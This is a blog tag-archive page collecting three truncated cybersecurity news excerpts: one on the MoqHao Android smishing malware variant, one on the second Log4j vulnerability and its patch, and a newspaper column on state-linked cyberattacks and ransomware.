Tag Archive for: immense

MoqHao Evolution Poses Immense Threat to Android Users

/in


Cybersecurity threat experts have recently discovered a new variant of the malware named XLoader, commonly known as MoqHao, that has the ability to automatically infect devices without any user interaction. Being termed the MoqHao evolution, this is a new version of the infamous android malware that has been long linked with Roaming Mantis, a financially motivated group of hackers based in China.

In this article, we will explore the background of MoqHao Evolution in detail and see how it operates differently from its earlier variants.

 

MoqHao Evolution – A Timeline


MoqHao is a mobile-based android threat that is used for phishing purposes and first appeared as a cybersecurity threat in 2015. Threat actors behind the malware-initiated attacks based on phishing activities through SMS, also referred to as “smishing,” in Asia. The major locations that were the target of MoqHao were Japan, South Korea, and Bangladesh. 

However, it later moved to European countries as well, like France and Germany. This received the attention of many cybersecurity threat experts. They deemed it as a serious threat to users because this notorious Android malware had robbed thousands of users by tricking them. 

Recent reports have mentioned that this Android malware now operates in 27 regional languages. This is a considerable increase from the 4 regional languages at the start, and highlights the widespread nature of the target users.


What Has Changed In MoqHao?


The biggest difference between the previous variants of this Android malware and the latest one is that it now does not need user interaction to infect the device. The earlier variants needed the user to launch this malware manually. After the user clicks on the installation link that is received through their phone’s SMS app, this new cybersecurity threat leads to the automatic execution of malicious code.


How The Evolved MoqHao Operates?


Understanding how the malware operates is essential for developing cybersecurity strategies. It masks itself as legitimate apps like the Chrome web browser by employing Unicode strings. However, if users are careful enough, they can identify it as the name of the software appears slightly…

Source…

Internet Faces Immense Risk As 2nd Serious Exploit Found, Patch Released

/in


hacker

As the Internet faces one of the most serious vulnerabilities in recent years putting millions of devices at hacking risk, attackers are now making thousands of attempts to exploit a second vulnerability involving a Java logging system called ‘Apache log4j2’.

The description of the new vulnerability, titled ‘CVE 2021-45046’, says the fix to address the earlier security bug (CVE-2021-44228) in ‘Apache Log4j 2.15.0’ was “incomplete in certain non-default configurations”.

“It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations.

“This could allow attackers… to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack,” the CVE description read.

Several popular services, including Apple iCloud, Amazon, Twitter, Cloudflare and Minecraft, are vulnerable to the ‘ubiquitous’ zero-day exploit.

Apache has now released a new security patch to address the second bug.

‘Apache Log4j’ is used in many forms of enterprise and open-source software, including cloud platforms, web applications and email services.

It is the most popular java logging library with over 400,000 downloads from its GitHub project. It is used by a vast number of companies worldwide, enabling logging in a wide set of popular applications.

“Exploiting this vulnerability is simple and allows threat actors to control java-based web servers and launch remote code execution attacks,” cyber security researchers at Check Point had said in a blog post.

Another cyber security company Sophos said that it is already detecting malicious cryptominer operations attempting to leverage the vulnerability, and there are credible reports from other sources that several automated botnets (such as Mirai, Tsunami, and Kinsing) have begun to exploit it as well.

At present, most of the attacks focus on the use of cryptocurrency mining at the expense of the victims. However, under the auspices of the noise, more advanced attackers may act aggressively against quality targets.

Researchers at Microsoft have also warned about attacks attempting to take advantage of ‘Log4j’ vulnerabilities,…

Source…

Valley News – Column: Data is immensely powerful, and it creates immense vulnerabilities

/in


America created cyberspace in its own image — free, open, decentralized, distributed and self-governing. If the internet had been created in China or Russia, its architecture would have been very different. Unfortunately, its very openness and freedom have become the source of its vulnerabilities.

Authoritarian nations find the freedom of cyberspace very threatening. They build firewalls to protect their societies from freedom. For geopolitical reasons, they also use cyber weapons to attack others.

A most attractive feature of cyberspace is that its entrance threshold is so low that an ingenious, self-taught person can create apps and new platforms and become rich; or become a hacker and get into infrastructure, financial or military systems without leaving a trace. Rogue states and well-organized digital terrorist groups use footloose hackers to steal intellectual property and pry into diplomatic and strategic plans.

Cybersecurity attacks are stealthy and insidious. There are no rules of the road to protect cyberspace, the domain in which all our activities — military, economic, commercial, political and cultural — are being done now. Power grids, financial systems and defense networks could be brought down, not only by hostile states but also by nonstate actors, alone or in collusion with their governments. Last October, a cyberattack shut down the electrical grid of Mumbai, India’s financial capital, plunging millions into darkness. The New York Times suggested that it was a Chinese cyberattack — a warning that China could not only fight India in the Himalayas, but also in its financial hub.

The May 7 ransomware attack on Colonial Pipeline, one of America’s largest fuel suppliers, was carried out by affiliates of a criminal hacking group, DarkSide. The attack crippled Colonial’s computer system, for which it had to pay the ransom in cryptocurrency — 75 bitcoins, or nearly $5 million, according media reports. Cryptocurrency based on blockchain technology is a possible future for global finance. Ransom in cryptocurrency cannot be traced at present.

One of America’s most precious assets, intellectual property, is under constant threat. Chinese hackers have been…

Source…